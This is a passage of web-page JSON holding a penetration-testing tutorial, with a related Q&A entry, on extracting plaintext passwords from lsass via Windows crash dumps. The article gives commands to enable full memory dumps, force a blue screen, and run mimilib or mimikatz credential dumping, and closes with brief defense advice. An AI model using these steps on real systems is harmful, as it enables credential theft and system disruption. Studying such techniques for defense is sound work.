[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5eHL4CtR0gN91FGVLk_uSXerF_9OoojOiLtZlaGHz2U":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},618,"What are the recommended defenses against password extraction from kernel-mode dump files?","The primary defense is to enable dump encryption as described in Microsoft's documentation about dump encryption, which protects the content even if an attacker gains the dump file. However, note that an attacker with administrator privileges can disable dump encryption. Additionally, security products can intercept the `MiniDumpWriteDump()` API to prevent user-mode dump creation. For related attack vectors, see [Penetration Techniques - From Exchange File Read\u002FWrite Permissions to Command Execution](\u002Fnews\u002Fpenetration-techniques-from-exchange-file-read-write-permissions-to-command-execution).","\u003Cp>The primary defense is to enable dump encryption as described in Microsoft&#39;s documentation about dump encryption, which protects the content even if an attacker gains the dump file. However, note that an attacker with administrator privileges can disable dump encryption. Additionally, security products can intercept the `MiniDumpWriteDump()` API to prevent user-mode dump creation. For related attack vectors, see [Penetration Techniques - From Exchange File Read\u002FWrite Permissions to Command Execution](\u002Fnews\u002Fpenetration-techniques-from-exchange-file-read-write-permissions-to-command-execution).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-extracting-passwords-from-dump-files-using-mimilib\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-recommended-defenses-against-password-extraction-from-kernel-mode-d-1777482486253","dump encryption, defense, administrator privileges, MiniDumpWriteDump, security products, crash dump protection",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},152,"Penetration Techniques - Extracting Passwords from Dump Files Using Mimilib","penetration-techniques-extracting-passwords-from-dump-files-using-mimilib","Learn to extract passwords from kernel-mode dump files using Mimilib as a WinDbg plugin, including setup, exploitation, and defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article 'Analysis of Mimilib Exploitation' mentioned that mimilib can be used as a WinDbg plugin. This article will detail the usage of this plugin to extract passwords from kernel-mode dump files, and provide defense recommendations based on exploitation approaches.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Classification of dump files\u003C\u002Fli>\u003Cli>Two methods for extracting dump files\u003C\u002Fli>\u003Cli>WinDbg environment configuration\u003C\u002Fli>\u003Cli>Exploitation approaches\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Classification of dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Dump files are divided into the following two categories:\u003C\u002Fp>\u003Ch3>1.User-Mode Dump File\u003C\u002Fh3>\u003Cp>User-mode dump files, which are divided into the following two types:\u003C\u002Fp>\u003Cul>\u003Cli>Full User-Mode Dumps\u003C\u002Fli>\u003Cli>Minidumps\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: Usually targets a single process\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fuser-mode-dump-files\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Can be created using Procdump\u003C\u002Fp>\u003Cp>Method for extracting passwords from user-mode dump files:\u003C\u002Fp>\u003Cp>Refer to the previous article 'Penetration Basics - Extracting Credentials from the lsass.exe Process'\u003C\u002Fp>\u003Ch3>2.Kernel-Mode Dump Files\u003C\u002Fh3>\u003Cp>Kernel-mode dump files, which are divided into the following five types:\u003C\u002Fp>\u003Cul>\u003Cli>Complete Memory Dump\u003C\u002Fli>\u003Cli>Kernel Memory Dump\u003C\u002Fli>\u003Cli>Small Memory Dump\u003C\u002Fli>\u003Cli>Automatic Memory Dump\u003C\u002Fli>\u003Cli>Active Memory Dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: includes information of all processes\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Enable the dump file creation feature, which will automatically create when the system crashes (BSOD)\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fkernel-mode-dump-files\u003C\u002Fp>\u003Ch2>0x03 Method for extracting passwords from kernel-mode dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Process is as follows:\u003C\u002Fp>\u003Cp>1. Enable the dump file feature\u003C\u002Fp>\u003Cp>2. Force a system blue screen (BSOD), the system will automatically create a kernel-mode dump file\u003C\u002Fp>\u003Cp>3. Use WinDbg to load the dump file, call mimilib to extract plaintext passwords\u003C\u002Fp>\u003Cp>Specific issues to note:\u003C\u002Fp>\u003Ch3>1. Enable dump file functionality\u003C\u002Fh3>\u003Cp>Corresponding registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CrashControl, registry entry CrashDumpEnabled, type REG_DWORD\u003C\u002Fp>\u003Cp>The functions corresponding to the values are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>0 indicates not enabled\u003C\u002Fli>\u003Cli>1 indicates complete memory dump\u003C\u002Fli>\u003Cli>2 indicates kernel memory dump\u003C\u002Fli>\u003Cli>3 indicates automatic memory dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The cmd command to view this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Here, the key value needs to be set to 1 to enable the complete memory dump functionality; otherwise, when using WinDbg to access the memory of the lsass.exe process, it will prompt an invalid page directory, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017288059_0_d6869dfee9.jpeg\">\u003C\u002Fp>\u003Cp>The cmd command to modify this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Force a system blue screen (BSOD)\u003C\u002Fh3>\u003Ch4>(1) Cause BSOD by terminating a process with the critical process attribute\u003C\u002Fh4>\u003Cp>The system processes that are critical by default are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>csrss.exe\u003C\u002Fli>\u003Cli>lsass.exe\u003C\u002Fli>\u003Cli>services.exe\u003C\u002Fli>\u003Cli>smss.exe\u003C\u002Fli>\u003Cli>svchost.exe\u003C\u002Fli>\u003Cli>wininit.exe\u003C\u002Fli>\u003C\u002Ful>\u003Cp>You can also set a specified process as a critical process first; terminating this process will also cause a BSOD.\u003C\u002Fp>\u003Cp>For specific details, refer to the previous article 'Analysis of Exploitation Causing BSOD by Terminating Processes'.\u003C\u002Fp>\u003Ch4>(2) Using NotMyFault\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fsysinternals\u002Fdownloads\u002Fnotmyfault\u003C\u002Fp>\u003Cp>The command to trigger a blue screen (BSOD) is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fcrash\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>NotMyFault also supports suspending the current system with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fhang\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, the system will automatically reboot after a Blue Screen of Death (BSOD) and generate the file c:\\windows\\MEMORY.DMP\u003C\u002Fp>\u003Ch3>3. Use WinDbg to load MEMORY.DMP\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>WinDbg can be automatically installed after installing the SDK\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fdebugger-download-tools\u003C\u002Fp>\u003Cp>Using WinDbg, select Open Crash Dump and choose MEMORY.DMP\u003C\u002Fp>\u003Cp>The command to obtain detailed dump file information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!analyze -v\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Error prompt: Kernel symbols are WRONG. Please fix symbols to do analysis.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017318291_1_52c3dbadaa.jpeg\">\u003C\u002Fp>\u003Cp>Here, the symbol files need to be fixed. You can choose from the following three solutions:\u003C\u002Fp>\u003Ch3>(1) using the _NT_SYMBOL_PATH environment variable.\u003C\u002Fh3>\u003Cp>Add environment variable:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>set _NT_SYMBOL_PATH=srv*c:\\mysymbol*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) using the -y \u003Csymbol_path> argument when starting the debugger.\u003C\u002Fsymbol_path>\u003C\u002Fh3>\u003Cp>Launch WinDbg with specified parameters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>windbg.exe -y SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(3) using .sympath and .sympath+\u003C\u002Fh3>\u003Cp>Add Symbol File Path\u003C\u002Fp>\u003Cp>WinDbg command line operation:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Can also be done via the interface\u003C\u002Fp>\u003Cp>File-&gt;Symbol File Path ...\u003C\u002Fp>\u003Cp>Enter SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003Cp>After setup, required symbol files will automatically download from the Microsoft public symbol server\u003C\u002Fp>\u003Cp>Reload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017362654_2_3101ff7258.jpeg\">\u003C\u002Fp>\u003Cp>If this part still fails, try using a VPN to connect to the internet\u003C\u002Fp>\u003Cp>If the test environment cannot connect to the internet, symbol files can be downloaded by obtaining manifest files via SymChk\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fusing-a-manifest-file-with-symchk\u003C\u002Fp>\u003Cp>Execute on computer A (without internet connection):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fom c:\\Manifest\\man.txt \u002Fid c:\\test\\MEMORY.DMP\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the file c:\\Manifest\\man.txt, copy it to computer B (with internet connection), and execute the following command on computer B:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fim c:\\test\\man.txt \u002Fs srv*c:\\mysymbolNew*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A new folder c:\\mysymbolNew will be generated. Copy it to computer A, start WinDbg on computer A, and specify the new symbol file location as c:\\mysymbolNew with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.symfix c:\\mysymbolNew\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003Cbr>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017391534_3_aaf1f568cc.jpeg\">\u003C\u002Fp>\u003Ch3>4. Load mimilib plugin\u003C\u002Fh3>\u003Cp>Refer to the previous article 'Mimilib Utilization Analysis'\u003C\u002Fp>\u003Ch3>(1) Method 1\u003C\u002Fh3>\u003Cp>Save mimilib.dll to the winext directory of WinDbg\u003C\u002Fp>\u003Cp>The saved path in my test environment (Server2012R2x64) is: C:\\Program Files\\Debugging Tools for Windows (x64)\\winext\u003C\u002Fp>\u003Cp>Start WinDbg\u003C\u002Fp>\u003Cp>The command to load the plugin is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) Method 2\u003C\u002Fh3>\u003Cp>Directly load the absolute path of mimilib, example as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load c:\\test\\mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In summary, the complete command to set up the configuration environment and export passwords is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003Cbr>.reload\u003Cbr>!process 0 0 lsass.exe\u003Cbr>.process 890f4530\u003Cbr>.load c:\\test\\mimilib\u003Cbr>.reload\u003Cbr>!mimikatz\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The complete process is shown in the following figure:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017417953_4_294dd38340.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017462794_5_b1efcc088e.jpeg\">\u003C\u002Fp>\u003Cp>To save the output results to a file, you can use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.logopen c:\\test\\log.txt\u003Cbr>!mimikatz\u003Cbr>.logclose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Obtain a dump file of the lsass.exe process via the API MiniDumpWriteDump()\u003C\u002Fp>\u003Cp>Use mimikatz to extract passwords from the dump file with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe log \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords full\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable the dump file functionality\u003C\u002Fp>\u003Cp>Force a system Blue Screen of Death (BSOD)\u003C\u002Fp>\u003Cp>Load the dump file using WinDbg and invoke mimilib to export plaintext passwords\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Intercept the behavior of the API MiniDumpWriteDump(); some security products already support this feature\u003C\u002Fp>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable dump encryption\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-server\u002Fvirtualization\u002Fhyper-v\u002Fmanage\u002Fabout-dump-encryption\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If an attacker gains administrator privileges on the system, they can disable dump encryption\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduced methods for extracting passwords from user-mode dump files and kernel-mode dump files, and provided defense recommendations based on exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article 'Analysis of Mimilib Exploitation' mentioned that mimilib can be used as a WinDbg plugin. This article will detail the usage of this plugin to extract passwords from kernel-mode dump files, and provide defense recommendations based on exploitation approaches.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Classification of dump files\u003C\u002Fli>\u003Cli>Two methods for extracting dump files\u003C\u002Fli>\u003Cli>WinDbg environment configuration\u003C\u002Fli>\u003Cli>Exploitation approaches\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Classification of dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Dump files are divided into the following two categories:\u003C\u002Fp>\u003Ch3>1.User-Mode Dump File\u003C\u002Fh3>\u003Cp>User-mode dump files, which are divided into the following two types:\u003C\u002Fp>\u003Cul>\u003Cli>Full User-Mode Dumps\u003C\u002Fli>\u003Cli>Minidumps\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: Usually targets a single process\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fuser-mode-dump-files\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Can be created using Procdump\u003C\u002Fp>\u003Cp>Method for extracting passwords from user-mode dump files:\u003C\u002Fp>\u003Cp>Refer to the previous article 'Penetration Basics - Extracting Credentials from the lsass.exe Process'\u003C\u002Fp>\u003Ch3>2.Kernel-Mode Dump Files\u003C\u002Fh3>\u003Cp>Kernel-mode dump files, which are divided into the following five types:\u003C\u002Fp>\u003Cul>\u003Cli>Complete Memory Dump\u003C\u002Fli>\u003Cli>Kernel Memory Dump\u003C\u002Fli>\u003Cli>Small Memory Dump\u003C\u002Fli>\u003Cli>Automatic Memory Dump\u003C\u002Fli>\u003Cli>Active Memory Dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: includes information of all processes\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Enable the dump file creation feature, which will automatically create when the system crashes (BSOD)\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fkernel-mode-dump-files\u003C\u002Fp>\u003Ch2>0x03 Method for extracting passwords from kernel-mode dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Process is as follows:\u003C\u002Fp>\u003Cp>1. Enable the dump file feature\u003C\u002Fp>\u003Cp>2. Force a system blue screen (BSOD), the system will automatically create a kernel-mode dump file\u003C\u002Fp>\u003Cp>3. Use WinDbg to load the dump file, call mimilib to extract plaintext passwords\u003C\u002Fp>\u003Cp>Specific issues to note:\u003C\u002Fp>\u003Ch3>1. Enable dump file functionality\u003C\u002Fh3>\u003Cp>Corresponding registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CrashControl, registry entry CrashDumpEnabled, type REG_DWORD\u003C\u002Fp>\u003Cp>The functions corresponding to the values are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>0 indicates not enabled\u003C\u002Fli>\u003Cli>1 indicates complete memory dump\u003C\u002Fli>\u003Cli>2 indicates kernel memory dump\u003C\u002Fli>\u003Cli>3 indicates automatic memory dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The cmd command to view this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Here, the key value needs to be set to 1 to enable the complete memory dump functionality; otherwise, when using WinDbg to access the memory of the lsass.exe process, it will prompt an invalid page directory, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017288059_0_d6869dfee9-1.jpeg\">\u003C\u002Fp>\u003Cp>The cmd command to modify this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Force a system blue screen (BSOD)\u003C\u002Fh3>\u003Ch4>(1) Cause BSOD by terminating a process with the critical process attribute\u003C\u002Fh4>\u003Cp>The system processes that are critical by default are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>csrss.exe\u003C\u002Fli>\u003Cli>lsass.exe\u003C\u002Fli>\u003Cli>services.exe\u003C\u002Fli>\u003Cli>smss.exe\u003C\u002Fli>\u003Cli>svchost.exe\u003C\u002Fli>\u003Cli>wininit.exe\u003C\u002Fli>\u003C\u002Ful>\u003Cp>You can also set a specified process as a critical process first; terminating this process will also cause a BSOD.\u003C\u002Fp>\u003Cp>For specific details, refer to the previous article 'Analysis of Exploitation Causing BSOD by Terminating Processes'.\u003C\u002Fp>\u003Ch4>(2) Using NotMyFault\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fsysinternals\u002Fdownloads\u002Fnotmyfault\u003C\u002Fp>\u003Cp>The command to trigger a blue screen (BSOD) is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fcrash\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>NotMyFault also supports suspending the current system with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fhang\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, the system will automatically reboot after a Blue Screen of Death (BSOD) and generate the file c:\\windows\\MEMORY.DMP\u003C\u002Fp>\u003Ch3>3. Use WinDbg to load MEMORY.DMP\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>WinDbg can be automatically installed after installing the SDK\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fdebugger-download-tools\u003C\u002Fp>\u003Cp>Using WinDbg, select Open Crash Dump and choose MEMORY.DMP\u003C\u002Fp>\u003Cp>The command to obtain detailed dump file information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!analyze -v\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Error prompt: Kernel symbols are WRONG. Please fix symbols to do analysis.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017318291_1_52c3dbadaa-1.jpeg\">\u003C\u002Fp>\u003Cp>Here, the symbol files need to be fixed. You can choose from the following three solutions:\u003C\u002Fp>\u003Ch3>(1) using the _NT_SYMBOL_PATH environment variable.\u003C\u002Fh3>\u003Cp>Add environment variable:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>set _NT_SYMBOL_PATH=srv*c:\\mysymbol*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) using the -y \u003Csymbol_path> argument when starting the debugger.\u003C\u002Fsymbol_path>\u003C\u002Fh3>\u003Cp>Launch WinDbg with specified parameters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>windbg.exe -y SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(3) using .sympath and .sympath+\u003C\u002Fh3>\u003Cp>Add Symbol File Path\u003C\u002Fp>\u003Cp>WinDbg command line operation:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Can also be done via the interface\u003C\u002Fp>\u003Cp>File-&gt;Symbol File Path ...\u003C\u002Fp>\u003Cp>Enter SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003Cp>After setup, required symbol files will automatically download from the Microsoft public symbol 